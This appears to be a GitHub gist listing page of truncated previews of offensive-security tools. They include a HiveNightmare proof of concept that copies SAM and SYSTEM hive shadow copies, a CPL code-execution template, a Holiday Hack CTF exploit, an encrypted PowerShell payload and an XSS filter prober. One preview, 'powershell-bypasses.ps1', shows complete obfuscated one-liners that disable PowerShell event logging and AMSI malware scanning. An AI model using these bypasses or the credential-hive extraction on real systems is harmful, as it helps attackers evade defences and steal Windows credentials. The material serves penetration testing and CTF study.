reigningshells
reigningshells
/ DllExportLister.cs
Created Sep 5, 2021
Simple C# program to list exports of 32 and 64 bit DLLs - output mirrored from dumpbin /exports
View DllExportLister.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| namespace DLLExportLister | |
| { | |
| class Program | |
| { | |
| // Can't use sizeof for IMAGE_SECTION_HEADER because of unmanaged type | |
| public const int SizeOfImageSectionHeader = 40; |
reigningshells
/ Invoke-HiveNightmare.ps1
Last active Sep 20, 2021
Super simple PowerShell PoC for HiveNightmare / SeriousSam that copies SAM and SYSTEM hive shadow copies to C:\Users\Public\Documents
View Invoke-HiveNightmare.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-HiveNightmare | |
| { | |
| if(((Get-Acl -LiteralPath C:\Windows\System32\config\sam).Access | where{($_.IdentityReference -eq "BUILTIN\Users") -and ($_.FileSystemRights -like "*Read*")}).Count -gt 0) | |
| { | |
| Write-Output "[*] VULNERABLE - BUILTIN\Users have Read access on C:\Windows\System32\config\sam" | |
| } | |
| else | |
| { | |
| Write-Output "[!] BUILTIN\Users do not have Read access on C:\Windows\System32\config\sam but may on volume shadow copies" | |
| } |
reigningshells
/ Cplapplet.cpp
Created Mar 7, 2021
DllMain template to execute code in a .cpl file which is just a renamed DLL that exports a function CplApplet
View Cplapplet.cpp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <Windows.h> | |
| extern "C" __declspec(dllexport) LONG CplApplet() | |
| { | |
| MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0); | |
| return 1; | |
| } |
reigningshells
/ HH2020-tag-generator-pseudo-shell.py
Created Jan 23, 2021
SANS Holiday Hack 2020 Broken Tag Generator Exploit - Solution for Objective 8
View HH2020-tag-generator-pseudo-shell.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import argparse | |
| import string | |
| import random | |
| import requests | |
| import urllib3 | |
| import base64 | |
| import readline |
reigningshells
/ cert-transparency-extractor.py
Last active Jul 20, 2020
Simple script to extract hostnames from cert transparency logs at crt.sh
View cert-transparency-extractor.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import argparse | |
| import requests | |
| from lxml import html | |
| import urllib3 | |
| # Nobody wants to see SSL warnings :-P | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
reigningshells
/ cryptedkerb.ps1
Created Feb 5, 2020
View cryptedkerb.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Expand-Script($Key) | |
| { | |
| $script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk |
View script-encoder.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Encode-Script | |
| { | |
| Param( | |
| [Parameter(Position = 0, Mandatory = $True)] | |
| [String] | |
| $Data, | |
| [Parameter(Position = 1, Mandatory = $True)] | |
| [String] | |
| $Key |
View powershell-bypasses.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logging bypass: | |
| (({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
| # AMSI Bypass (old, burned) | |
| sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
| # New AMSI bypass obfuscation: |
reigningshells
/ badchars.py
Created May 24, 2019
Simple script to identify an XSS filters "bad characters"
View badchars.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Very simple script to automate the discovery of | |
| bad characters in XSS filters that replace | |
| the entire user input string with an empty string | |
| [CR] = Carriage Return or \r | |
| [LF] = Line Feed or \n |